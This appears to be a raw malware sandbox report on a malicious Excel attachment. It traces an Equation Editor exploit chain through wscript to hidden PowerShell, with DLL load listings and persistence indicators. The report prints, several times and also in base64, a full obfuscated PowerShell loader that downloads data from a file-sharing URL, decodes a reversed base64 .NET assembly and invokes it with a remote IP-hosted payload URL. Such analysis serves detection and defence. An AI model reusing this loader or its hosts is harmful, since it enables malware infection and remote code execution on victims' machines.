[System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLD
daJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000D.00000002.472460335.0000000005046000.00000004.00000020.00020000.00000000.sdmp
Source: 8A830000.0.dr Initial sample: OLE indicators vbamacros = False
Source: Pedido No 4500924462.xls Initial sample: OLE indicators encrypted = True

    Data Obfuscation

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_002321C8 push ebx; iretd 13_2_002321EA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_002325E1 push ebx; retf 13_2_002325EA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00400B48 pushad ; ret 13_2_00400F89

    Persistence and Installation Behavior

    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \Device\RdpDr\;:1\ljg.cl@SSL\DavWWWRoot
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \Device\RdpDr\;:1\ljg.cl@SSL\DavWWWRoot
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File dump: seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc.0.dr
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File dump: B7AFCBA1.doc.3.dr
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Section loaded: netapi32.dll and davhlpr.dll loaded
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_035705DC URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_035705DC
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (17 identical entries)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (31 identical entries)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (6 identical entries)
    Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)
